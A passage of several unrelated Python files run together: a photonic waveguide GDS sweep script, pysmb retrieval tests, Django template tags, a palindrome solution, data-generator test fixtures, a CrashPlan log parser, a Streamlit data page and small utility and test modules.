0}) r = r + resolution return self.radius_sweep_mapping def sweep_bezier(self, width, radius, bezier_range, resolution): ''' Generate GDS sweep of radii given a resolution Sweep radii give the resolution and get as close as possible to the end radius range. Command line commands that work: #C:\\klayout-0.26.6-win64\\klayout_app.exe -b -r C:\\Users\\seanl\\KLayout\\pymacros\\test_python_cmd_line.py -rd bob="hello world" #C:\\klayout-0.26.6-win64\\klayout_app.exe -r "C:\\Users\\seanl\\Documents\\01_UBC\\Academics\\Grad School\\01_Work\\PDK-Generator\\Repo\\PDK-Generator\\python\\lumgen\\create_gds_klayout.py" -rd techname="EBeam" -rd libname="EBeam" -rd pcellname="Waveguide" -rd out_dir="C:\\Users\\seanl\\Downloads\\test7.gds" -rd params="{\\"radius\\": 2}" Parameters ---------- width : float Waveguide width (um) radius : float Waveguide bend radius (um) bezier_range : list of floats (Size of 2) First entry is the minimum bezier param, second entry is the max bezier param. resolution : float Increment size between each bezier value. Returns ------- self.bezier_sweep_mapping : dict Keys = GDS file location, Vals = bezier param ''' print("Create waveguide GDS sweeping bezier param") print("Running KLayout in command line...") print("NOTE: If you copy and paste the following commands into cmd line, ensure quotations are around file paths so that spaces are captured\n") if self.klayout_app_path == None: self.klayout_app_path = get_klayout_app_path() self.bezier_sweep_mapping = {} length = radius + self.bend_to_straight_margin b = bezier_range[0] while b <= bezier_range[1]: gds_path = os.path.join(self.gds_dir,"Waveguide_b={}_r={}nm.gds".format(b, int(radius*1000))) self.bezier_sweep_mapping[gds_path] = b generate_gds_from_pcell(gds_path, self.techname, self.libname, self.pcellname, params = {"path": [[0,0],[length,0], [length,length]], "radius": radius, "widths": [width], "bezier": b, "adiab": 1}) b = b + resolution return self.bezier_sweep_mapping def sweep_bezier_and_radius(self, width, radius_list, bezier_range, resolution): self.bezier_radius_sweep_mapping = {} for radius in radius_list: self.bezier_radius_sweep_mapping[radius] = self.sweep_bezier(width, radius, bezier_range, resolution) return self.bezier_radius_sweep_mapping def create_geometry_dirs(self): # define paths self.gds_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)),"gds") # create dirs if not available if not os.path.isdir(self.gds_dir): os.mkdir(self.gds_dir) if __name__ == "__main__": # Test 1: Generate raw GDS and generate geometry in Lumerical # gds_file = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))),r"design_automation\Waveguide\Waveguide_w=100nm.gds") # design_file = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))),r"design_automation\Waveguide\Waveguide_design.yml") # process_file = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))),"yaml_processes","SiEPICfab-Grouse-Base.lbr") # mode = lumapi.MODE(hide = False) # WGS = WaveguideStripGeometry(design_file, process_file, mode) # generate_lum_geometry(mode, process_file, gds_file) # Test 2: Generate PCell GDS sweeping radius gds_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),"gds","Waveguide_r=1000nm.gds") design_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),"Waveguide_design.yml") process_file = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))),"yaml_processes","SiEPICfab-Grouse-Base.lbr") fdtd = lumapi.FDTD(hide = False) WGS1 = WaveguideStripGeometry(design_file, process_file, fdtd) WGS1.sweep_radius(0.5,[1,2],1) generate_lum_geometry(fdtd, process_file, gds_file) # Test 3: Generate PCell GDS sweeping bezier # gds_file = os.path.join(os.path.dirname(os.path.abspath(__file__)),"Waveguide_r=1000nm.gds") # design_file = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))),r"design_automation\Waveguide\Waveguide_design.yml") # process_file = os.path.join(os.path.dirname(os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))),"yaml_processes","SiEPICfab-Grouse-Base.lbr") # WGS1 = WaveguideStripGeometry(design_file, process_file) # WGS1.sweep_bezier(0.5, 5, [0.1,0.2],0.1) # -*- coding: utf-8 -*- import os, tempfile from io import BytesIO from smb.SMBConnection import SMBConnection from smb.smb2_constants import SMB2_DIALECT_2 from .util import getConnectionInfo from nose.tools import with_setup from smb import smb_structs try: import hashlib def MD5(): return hashlib.md5() except ImportError: import md5 def MD5(): return md5.new() conn = None def setup_func_SMB1(): global conn smb_structs.SUPPORT_SMB2 = smb_structs.SUPPORT_SMB2x = False info = getConnectionInfo() conn = SMBConnection(info['user'], info['password'], info['client_name'], info['server_name'], use_ntlm_v2 = True, is_direct_tcp = True) assert conn.connect(info['server_ip'], info['server_port']) def setup_func_SMB2(): global conn smb_structs.SUPPORT_SMB2 = True smb_structs.SUPPORT_SMB2x = False info = getConnectionInfo() conn = SMBConnection(info['user'], info['password'], info['client_name'], info['server_name'], use_ntlm_v2 = True, is_direct_tcp = True) assert conn.connect(info['server_ip'], info['server_port']) def setup_func_SMB2x(): global conn smb_structs.SUPPORT_SMB2 = smb_structs.SUPPORT_SMB2x = True info = getConnectionInfo() conn = SMBConnection(info['user'], info['password'], info['client_name'], info['server_name'], use_ntlm_v2 = True, is_direct_tcp = True) assert conn.connect(info['server_ip'], info['server_port']) def teardown_func(): global conn conn.close() @with_setup(setup_func_SMB1, teardown_func) def test_retr_multiplereads_SMB1(): # Test file retrieval using multiple ReadAndx calls (assuming each call will not reach more than 65534 bytes) global conn temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', '/rfc1001.txt', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '5367c2bbf97f521059c78eab65309ad3' assert filesize == 158437 temp_fh.close() @with_setup(setup_func_SMB2, teardown_func) def test_retr_multiplereads_SMB2(): # Test file retrieval using multiple ReadAndx calls (assuming each call will not reach more than 65534 bytes) global conn assert conn.smb2_dialect == SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', '/rfc1001.txt', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '5367c2bbf97f521059c78eab65309ad3' assert filesize == 158437 temp_fh.close() @with_setup(setup_func_SMB2x, teardown_func) def test_retr_multiplereads_SMB2x(): # Test file retrieval using multiple ReadAndx calls (assuming each call will not reach more than 65534 bytes) global conn assert conn.smb2_dialect != SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', '/rfc1001.txt', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '5367c2bbf97f521059c78eab65309ad3' assert filesize == 158437 temp_fh.close() @with_setup(setup_func_SMB1, teardown_func) def test_retr_longfilename_SMB1(): # Test file retrieval that has a long English filename global conn temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', '/Implementing CIFS - SMB.html', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '671c5700d279fcbbf958c1bba3c2639e' assert filesize == 421269 temp_fh.close() @with_setup(setup_func_SMB2, teardown_func) def test_retr_longfilename_SMB2(): # Test file retrieval that has a long English filename global conn assert conn.smb2_dialect == SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', '/Implementing CIFS - SMB.html', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '671c5700d279fcbbf958c1bba3c2639e' assert filesize == 421269 temp_fh.close() @with_setup(setup_func_SMB2x, teardown_func) def test_retr_longfilename_SMB2x(): # Test file retrieval that has a long English filename global conn assert conn.smb2_dialect != SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', '/Implementing CIFS - SMB.html', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '671c5700d279fcbbf958c1bba3c2639e' assert filesize == 421269 temp_fh.close() @with_setup(setup_func_SMB1, teardown_func) def test_retr_unicodefilename_SMB1(): # Test file retrieval that has a long non-English filename inside a folder with a non-English name global conn temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '8a44c1e80d55e91c92350955cdf83442' assert filesize == 256000 temp_fh.close() @with_setup(setup_func_SMB2, teardown_func) def test_retr_unicodefilename_SMB2(): # Test file retrieval that has a long non-English filename inside a folder with a non-English name global conn assert conn.smb2_dialect == SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '8a44c1e80d55e91c92350955cdf83442' assert filesize == 256000 temp_fh.close() @with_setup(setup_func_SMB2x, teardown_func) def test_retr_unicodefilename_SMB2x(): # Test file retrieval that has a long non-English filename inside a folder with a non-English name global conn assert conn.smb2_dialect != SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFile('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '8a44c1e80d55e91c92350955cdf83442' assert filesize == 256000 temp_fh.close() @with_setup(setup_func_SMB1, teardown_func) def test_retr_offset_SMB1(): # Test file retrieval from offset to EOF global conn temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == 'a141bd8024571ce7cb5c67f2b0d8ea0b' assert filesize == 156000 temp_fh.close() @with_setup(setup_func_SMB2, teardown_func) def test_retr_offset_SMB2(): # Test file retrieval from offset to EOF global conn assert conn.smb2_dialect == SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == 'a141bd8024571ce7cb5c67f2b0d8ea0b' assert filesize == 156000 temp_fh.close() @with_setup(setup_func_SMB2x, teardown_func) def test_retr_offset_SMB2x(): # Test file retrieval from offset to EOF global conn assert conn.smb2_dialect != SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == 'a141bd8024571ce7cb5c67f2b0d8ea0b' assert filesize == 156000 temp_fh.close() @with_setup(setup_func_SMB1, teardown_func) def test_retr_offset_and_biglimit_SMB1(): # Test file retrieval from offset with a big max_length global conn temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 100000) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '83b7afd7c92cdece3975338b5ca0b1c5' assert filesize == 100000 temp_fh.close() @with_setup(setup_func_SMB2, teardown_func) def test_retr_offset_and_biglimit_SMB2(): # Test file retrieval from offset with a big max_length global conn assert conn.smb2_dialect == SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 100000) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '83b7afd7c92cdece3975338b5ca0b1c5' assert filesize == 100000 temp_fh.close() @with_setup(setup_func_SMB2x, teardown_func) def test_retr_offset_and_biglimit_SMB2x(): # Test file retrieval from offset with a big max_length global conn assert conn.smb2_dialect != SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 100000) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '83b7afd7c92cdece3975338b5ca0b1c5' assert filesize == 100000 temp_fh.close() @with_setup(setup_func_SMB1, teardown_func) def test_retr_offset_and_smalllimit_SMB1(): # Test file retrieval from offset with a small max_length global conn temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 10) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '746f60a96b39b712a7b6e17ddde19986' assert filesize == 10 temp_fh.close() @with_setup(setup_func_SMB2, teardown_func) def test_retr_offset_and_smalllimit_SMB2(): # Test file retrieval from offset with a small max_length global conn assert conn.smb2_dialect == SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 10) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '746f60a96b39b712a7b6e17ddde19986' assert filesize == 10 temp_fh.close() @with_setup(setup_func_SMB2x, teardown_func) def test_retr_offset_and_smalllimit_SMB2x(): # Test file retrieval from offset with a small max_length global conn assert conn.smb2_dialect != SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 10) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == '746f60a96b39b712a7b6e17ddde19986' assert filesize == 10 temp_fh.close() @with_setup(setup_func_SMB1, teardown_func) def test_retr_offset_and_zerolimit_SMB1(): # Test file retrieval from offset to EOF with max_length=0 global conn temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 0) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == 'd41d8cd98f00b204e9800998ecf8427e' assert filesize == 0 temp_fh.close() @with_setup(setup_func_SMB2, teardown_func) def test_retr_offset_and_zerolimit_SMB2(): # Test file retrieval from offset to EOF with max_length=0 global conn assert conn.smb2_dialect == SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 0) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == 'd41d8cd98f00b204e9800998ecf8427e' assert filesize == 0 temp_fh.close() @with_setup(setup_func_SMB2x, teardown_func) def test_retr_offset_and_zerolimit_SMB2x(): # Test file retrieval from offset to EOF with max_length=0 global conn assert conn.smb2_dialect != SMB2_DIALECT_2 temp_fh = BytesIO() file_attributes, filesize = conn.retrieveFileFromOffset('smbtest', u'/测试文件夹/垃圾文件.dat', temp_fh, offset = 100000, max_length = 0) md = MD5() md.update(temp_fh.getvalue()) assert md.hexdigest() == 'd41d8cd98f00b204e9800998ecf8427e' assert filesize == 0 temp_fh.close() yejia/osl_notebook from django import template register = template.Library() from notebook.snippets.models import Snippet from notebook.bookmarks.models import Bookmark from notebook.scraps.models import Scrap from notebook.notes.models import Frame, Note from notebook.notes.constants import * @register.inclusion_tag('framebook/notes/note/children.html', takes_context=True) def tree_view_tag(context, frame): frame.owner_name = context['profile_username'] #print 'frame.owner_name:', frame.owner_name sort = context['sort'] children = frame.get_notes_in_order(sort) for child in children: child.owner_name = frame.owner_name return {'children': children, 'profile_username':context['profile_username'], \ 'book_uri_prefix':context['book_uri_prefix'], 'sort':sort, 'pick_lang':context['pick_lang'], 'parent_frame_id':frame.id, 'user':context['user']} #parent_frame_id used for removing note from frame. @register.inclusion_tag('framebook/notes/note/children.html', takes_context=True) def social_tree_view_tag(context, frame): sort = context['sort'] children = frame.get_notes_in_order(sort) return {'children': children, \ 'book_uri_prefix':context['book_uri_prefix'], 'sort':sort, 'pick_lang':context['pick_lang']} from notebook.tags.views import AddTagFrameForm @register.inclusion_tag('tagframes/children.html', takes_context=True) def tag_tree_view_tag(context, frame): frame.owner_name = context['profile_username'] #print 'frame.owner_name:', frame.owner_name sort = context['sort'] children = frame.get_tags_in_order(sort) for child in children: child.owner_name = frame.owner_name if child.get_tag_type() == 'Leaf' or child.note_set.count(): child.snippets_count = Snippet.objects.using(child.owner_name).filter(deleted=False, tags=child).count() child.public_snippets_count = Snippet.objects.using(child.owner_name).filter(deleted=False, private=False, tags=child).count() child.bookmarks_count = Bookmark.objects.using(child.owner_name).filter(deleted=False, tags=child).count() child.public_bookmarks_count = Bookmark.objects.using(child.owner_name).filter(deleted=False,private=False, tags=child).count() child.scraps_count = Scrap.objects.using(child.owner_name).filter(deleted=False, tags=child).count() child.public_scraps_count = Scrap.objects.using(child.owner_name).filter(deleted=False, private=False, tags=child).count() child.frames_count = Frame.objects.using(child.owner_name).filter(deleted=False, tags=child).count() child.public_frames_count = Frame.objects.using(child.owner_name).filter(deleted=False, private=False, tags=child).count() child.notes_count = Note.objects.using(child.owner_name).filter(deleted=False, tags=child).count() child.public_notes_count = Note.objects.using(child.owner_name).filter(deleted=False, private=False, tags=child).count() addTagFrameForm = AddTagFrameForm() return {'children': children, 'profile_username':context['profile_username'], \ 'sort':sort, 'addTagFrameForm':addTagFrameForm, 'frame':frame, 'username':context['username'], 'profile_username':context['profile_username'], 'all_words':all_words,'private':context['private'], 'true_words':context['true_words'], 'all_words':context['all_words'], 'false_words':context['false_words'] #'pick_lang':context['pick_lang'] } Problems/0009_Palindrome_Number.py # Runtime: 56 ms, faster than 82.79% of Python3 online submissions for Palindrome Number. # Memory Usage: 14.2 MB, less than 51.48% of Python3 online submissions for Palindrome Number. # https://leetcode.com/submissions/detail/592091803/ class Solution: def isPalindrome(self, x: int) -> bool: return str(x) == str(x)[::-1] 10-100 from pytest import fixture @fixture def simple_specification(): return {'size': 100, 'locale': 'pt_BR', 'fields': [{'name': 'id', 'type': 'integer:sequence', 'generator': {}, 'expected': 'int64'}, {'name': 'text', 'type': 'pystr', 'generator': {}, 'expected': 'object'}]} @fixture def argumented_specification(): return {'size': 200, 'locale': 'pt_BR', 'fields': [{'name': 'id', 'type': 'integer:sequence', 'generator': {'start_at': 10, 'step': 2}, 'expected': 'int64'}, {'name': 'date', 'type': 'date_time_between', 'generator': {'start_date': "-10d", 'end_date': '+1y'}, 'expected': 'datetime64[ns]'}]} def sample(type, expected): return {'size': 200, 'locale': 'pt_BR', 'fields': [{'name': 'id', 'type': type, 'generator': {}, 'expected': expected}]} def dataframe_sample(type, expected): return { 'datasets': { 'sample': { 'size': 200, 'locale': 'pt_BR', 'fields': [ { 'name': 'id', 'type': type, 'generator': {}, 'expected': expected } ], 'format': {'type': 'csv'}, 'serializers': { 'to': [ { 'type': 'file', 'uri': '' } ] } } } } def sample_timestamp(type, expected): return {'size': 200, 'locale': 'pt_BR', 'fields': [{'name': 'id', 'type': type, 'generator': { 'start_date': '-1d', 'end_date': '+1d' }, 'expected': expected}]} def sample_timestamp_sequence(type, expected): return {'size': 200, 'locale': 'pt_BR', 'fields': [{'name': 'id', 'type': type, 'generator': { 'start_at': '2019-01-01T01:00:00Z' }, 'expected': expected}]} @fixture def integer_specification(): return sample('pyint', 'int64') @fixture def bool_specification(): return dataframe_sample('boolean', 'bool') @fixture def char_specification(): return sample('pystr', 'object') @fixture def name_specification(): return sample('name', 'object') @fixture def float_specification(): return sample('pyfloat', 'float64') @fixture def timestamp_sequence_specification(): return sample_timestamp_sequence('timestamp:sequence', 'datetime64[ns]') @fixture def integer_sequence_specification(): return sample('integer:sequence', 'int64') @fixture def string_specification(): return sample('pystr', 'object') @fixture def timestamp_specification(): return sample_timestamp('date_time_between', 'datetime64[ns]') @fixture def valid_specification(): return { "datasets": { "teste3": { "fields": [ { "type": "integer:sequence", "name": "id", "generator": { "start_at": 1 } } ], "size": 100, "locale": "pt_BR", "format": { "type": "csv" }, "serializers": { "to": [ { "type": "file", "uri": "/tmp/teste.csv" } ] } } } } @fixture def no_datasets_specification(): return {} @fixture def invalid_no_ids_dataset(): return {"datasets": {}} @fixture def invalid_no_size_dataset(): return {"datasets": { "$id": { "fields": [], "locale": "", "format": {}, "serializers": {} } } } @fixture def invalid_no_locale_dataset(): return {"datasets": { "$id": { "fields": [], "size": 10, "format": {}, "serializers": {} } } } @fixture def invalid_no_size_dryrun(): return {"datasets": { "$id": { "fields": [], "format": {}, "serializers": {} } } } @fixture def invalid_dataset_specification(): return {"datasets": { "teste3": { "fields": [{"type": "integer:sequence", "name": "id", "generator": {"start_at": 1}}], "size": "", "locale": "pt_BR", "format": {"type": "csv"}, "serializers": { "to": [{"type": "file", "uri": "/tmp/teste.csv"}]}}}} @fixture def valid_dryrun(): return {"size": 10, "locale": "pt_BR", "fields": [{ "name": "code", "type": "integer:sequence", "generator": {"start_at": 10} }] } @fixture def invalid_dateformat(): return {"datasets": { "teste3": { "fields": [{"type": "integer:sequence", "name": "id", "generator": {"start_at": 1}}, {"type": "date_time", "name": "created_at", "generator": {}}], "size": 1000, "locale": "pt_BR", "format": {"type": "csv", "options": { "header": True, "sep": "," }}, "serializers": { "to": [{"type": "file", "uri": "/tmp/teste.csv"}]}}}} @fixture def malformed_json(): return "[]]" @fixture def unknown_type_spec(): return {"datasets": { "teste3": { "fields": [{"type": "timestamp", "name": "created_at", "generator": {}}], "size": 1000, "locale": "pt_BR", "format": {"type": "csv", "options": { "header": True, "sep": "," }}, "serializers": { "to": [{"type": "file", "uri": "/tmp/teste.csv"}]}}}} @fixture def valid_spec_for_replace_rules(): false = False true = True return { "datasets": { "sample": { "size": 10, "locale": "pt_BR", "fields": [ { "type": "integer:sequence", "name": "id", "generator": { "start_at": 1 } }, { "type": "name", "name": "name", "generator": {} }, { "type": "pyint", "name": "age", "generator": { "max_value": 120 } }, { "type": "pyfloat", "name": "weight", "generator": { "positive": false, "min_value": 0, "max_value": 250 } }, { "type": "job", "name": "job", "generator": {} }, { "type": "future_datetime", "name": "datetime", "generator": {} } ], "format": { "type": "sql", "options": { "table_name": "My_table", "mode": "replace", "schema": { "id": { "sqltype": "INTEGER NOT NULL", "quoted": false }, "name": { "sqltype": "VARCHAR(50)", "quoted": true }, "age": { "sqltype": "INTEGER NOT NULL", "quoted": false }, "weight": { "sqltype": "INTEGER NOT NULL", "quoted": false }, "job": { "sqltype": "VARCHAR(50)", "quoted": true }, "datetime": { "sqltype": "DATETIME", "quoted": false } } } }, "serializers": { "to": [ { "type": "file", "uri": "/home/tadeu/Desktop/dataset.sql" } ] } } } } @fixture def invalid_spec_for_replace_rules_without_schema(): false = False return { "datasets": { "sample": { "size": 10, "locale": "pt_BR", "fields": [ { "type": "integer:sequence", "name": "id", "generator": { "start_at": 1 } }, { "type": "name", "name": "name", "generator": {} }, { "type": "pyint", "name": "age", "generator": { "max_value": 120 } }, { "type": "pyfloat", "name": "weight", "generator": { "positive": false, "min_value": 0, "max_value": 250 } }, { "type": "job", "name": "job", "generator": {} }, { "type": "future_datetime", "name": "datetime", "generator": {} } ], "format": { "type": "sql", "options": { "table_name": "My_table", "mode": "replace" } }, "serializers": { "to": [ { "type": "file", "uri": "/home/tadeu/Desktop/dataset.sql" } ] } } } } @fixture def invalid_spec_for_replace_rules_without_sqltype(): false = False return { "datasets": { "sample": { "size": 10, "locale": "pt_BR", "fields": [ { "type": "integer:sequence", "name": "id", "generator": { "start_at": 1 } }, { "type": "name", "name": "name", "generator": {} }, { "type": "pyint", "name": "age", "generator": { "max_value": 120 } }, { "type": "pyfloat", "name": "weight", "generator": { "positive": false, "min_value": 0, "max_value": 250 } }, { "type": "job", "name": "job", "generator": {} }, { "type": "future_datetime", "name": "datetime", "generator": {} } ], "format": { "type": "sql", "options": { "table_name": "My_table", "mode": "replace", "schema": { "id": { "quoted": false } } } }, "serializers": { "to": [ { "type": "file", "uri": "/home/tadeu/Desktop/dataset.sql" } ] } } } } from .reaper import handler vendor/munkireport/crashplan/scripts/crashplan.py #!/usr/bin/python """ extracts information about the external displays from system profiler """ import sys import csv import os import re from datetime import datetime def cp_date_to_unixtimestamp(cp_date): """ Convert Crashplan date to unix timestamp """ dt = datetime.strptime(cp_date, "%m/%d/%y %I:%M%p") #ep = dt.fromtimestamp(0) #diff = dt - ep #return int(diff.total_seconds()) return int(datetime.strftime(dt, "%s")) # Skip manual check if len(sys.argv) > 1: if sys.argv[1] == 'manualcheck': print 'Manual check: skipping' exit(0) crashplan_log="/Library/Logs/CrashPlan/history.log" crashplan_log_0="/Library/Logs/CrashPlan/history.log.0" cacheFile = 'crashplan.txt' # convoluted code because Code42 can't decide what log name formatting to use if os.path.exists(crashplan_log): if os.path.exists(crashplan_log_0): if os.path.getctime(crashplan_log) > os.path.getctime(crashplan_log_0): pass else: crashplan_log = crashplan_log_0 else: pass else: if os.path.exists(crashplan_log_0): crashplan_log = crashplan_log_0 # crashplan logformat regex = re.compile(r'. (\d+\/\d+\/\d+ \d+:\d+[AP]M)\s+(\[[^\]]+\])\s+(.*)') start = 0 destinations = {} if os.path.exists(crashplan_log): with open(crashplan_log, mode='r', buffering=-1) as cplog: for line in cplog: m = regex.match(line) if m: timestamp = cp_date_to_unixtimestamp(m.group(1)) destination = m.group(2) message = m.group(3) # Check if destination is enclosed with [] if not re.match(r'^\[.+\]$', destination): continue if not destinations.get(destination): destinations[destination] = {'destination': destination, 'start': 0, 'last_success': 0, 'duration': 0, 'last_failure': 0, 'reason': ''} if re.match(r'^Starting backup', message): destinations[destination]['start'] = timestamp elif re.match(r'^Completed backup', message): if destinations[destination]['start']: duration = timestamp - destinations[destination]['start'] destinations[destination]['duration'] = duration else: destinations[destination]['duration'] = 0 destinations[destination]['last_success'] = timestamp elif re.match(r'^Stopped backup', message): reason = re.match(r'.*Reason for stopping backup: (.*)', next(cplog)) if reason: if reason.group(1) == "Nothing to do": destinations[destination]['last_success'] = timestamp elif reason.group(1): destinations[destination]['last_failure'] = timestamp destinations[destination]['reason'] = reason.group(1) else: destinations[destination]['last_failure'] = timestamp destinations[destination]['reason'] = 'unknown' else: print "CrashPlan log not found at: %s or %s" % (crashplan_log, crashplan_log_0) # Make sure cachedir exists cachedir = '%s/cache' % os.path.dirname(os.path.realpath(__file__)) if not os.path.exists(cachedir): os.makedirs(cachedir) # Write to file listWriter = csv.DictWriter( open(os.path.join(cachedir, cacheFile), 'wb'), fieldnames=['destination', 'start', 'last_success', 'duration', 'last_failure', 'reason'], delimiter=',', quotechar='"', quoting=csv.QUOTE_MINIMAL ) listWriter.writeheader() for name, values in destinations.iteritems(): listWriter.writerow(values) 0 # Load important libraries import pandas as pd import streamlit as st import os from pages import utils def app(): """This application is created to help the user change the metadata for the uploaded file. They can perform merges. Change column names and so on. """ # Load the uploaded data if 'main_data.csv' not in os.listdir('data'): st.markdown("Please upload data through `Upload Data` page!") else: data = pd.read_csv('data/main_data.csv') st.dataframe(data) # Read the column meta data for this dataset col_metadata = pd.read_csv('data/metadata/column_type_desc.csv') ''' Change the information about column types Here the info of the column types can be changed using dropdowns. The page is divided into two columns using beta columns ''' st.markdown("#### Change the information about column types") # Use two column technique col1, col2 = st.columns(2) global name, type # Design column 1 name = col1.selectbox("Select Column", data.columns) # Design column two current_type = col_metadata[col_metadata['column_name'] == name]['type'].values[0] print(current_type) column_options = ['numerical', 'categorical'] current_index = column_options.index(current_type) type = col2.selectbox("Select Column Type", options=column_options, index = current_index) st.write("""Select your column name and the new type from the data. To submit all the changes, click on *Submit changes* """) if st.button("Change Column Type"): # Set the value in the metadata and resave the file # col_metadata = pd.read_csv('data/metadata/column_type_desc.csv') st.dataframe(col_metadata[col_metadata['column_name'] == name]) col_metadata.loc[col_metadata['column_name'] == name, 'type'] = type col_metadata.to_csv('data/metadata/column_type_desc.csv', index = False) st.write("Your changes have been made!") st.dataframe(col_metadata[col_metadata['column_name'] == name]) #Drop columns st.markdown("#### Drop Some columns") #select columns to be dropped cols_drop = st.multiselect("Select Column to drop", options = data.columns) #if drop column button is pushed if st.button("Drop Columns"): if cols_drop is not None: #drop columns and save in new variable new_data = data.drop(cols_drop, axis = 1) #add text indicating columns user dropped st.write("#### You have dropped column(s): {}".format(cols_drop)) #diplay new data preview st.dataframe(new_data.head()) #save metadata of new dataset columns = utils.get_types(new_data) columns.to_csv('data/metadata/new_data_column_type_desc.csv', index = False) #save new data to csv new_data.to_csv('data/new_main_data.csv', index=False)AspirinCode/jupyter-genomics """This module exposes utility functions and classes for working with pandas objects.""" # third-party libraries import pandas __author__ = '' __maintainer__ = "" __email__ = "" __status__ = "prototype" def add_series_to_dataframe(dataframe, series, header): """Insert the input series into the input dataframe with the specified column header. Args: dataframe (pandas.DataFrame): The dataframe to which to add a column; insert is done in-place. series (array-like, dict, or scalar value): The column values to add to the dataframe. header (str): The name to be used for the new column. """ dataframe.loc[:, header] = pandas.Series(series, index=dataframe.index)lsst-sqre/sphinxkit """Tests for the documenteer.stackdocs.doxygentag module. """ import importlib.util from pathlib import Path from zipfile import ZipFile import pytest from documenteer.stackdocs.doxygentag import get_tag_entity_names if importlib.util.find_spec("sphinxcontrib.doxylink"): doxylink_installed = True else: doxylink_installed = False @pytest.fixture(scope="session") def tag_path(tmp_path_factory): zipped_path = Path(__file__).parent / "data" / "doxygen.tag.zip" base_dir = tmp_path_factory.mktemp("doxygentag") with ZipFile(zipped_path) as tagzip: tagzip.extract("doxygen.tag", path=base_dir) return base_dir / "doxygen.tag" @pytest.mark.skipif( doxylink_installed is False, reason="sphinxcontrib.doxylink must be installed", ) @pytest.mark.skip(reason="Not currently working") def test_get_tag_entity_names_all(tag_path): names = get_tag_entity_names(tag_path) assert "lsst::afw::table::Schema" in names @pytest.mark.skipif( doxylink_installed is False, reason="sphinxcontrib.doxylink must be installed", ) @pytest.mark.skip(reason="Not currently working") def test_get_tag_entity_names_files(tag_path): names = get_tag_entity_names(tag_path, kinds=["file"]) assert "lsst::afw::table::Schema" not in names for name in names: assert name.endswith(".h") 0 start = int(input()) end = int(input()) magick_num = 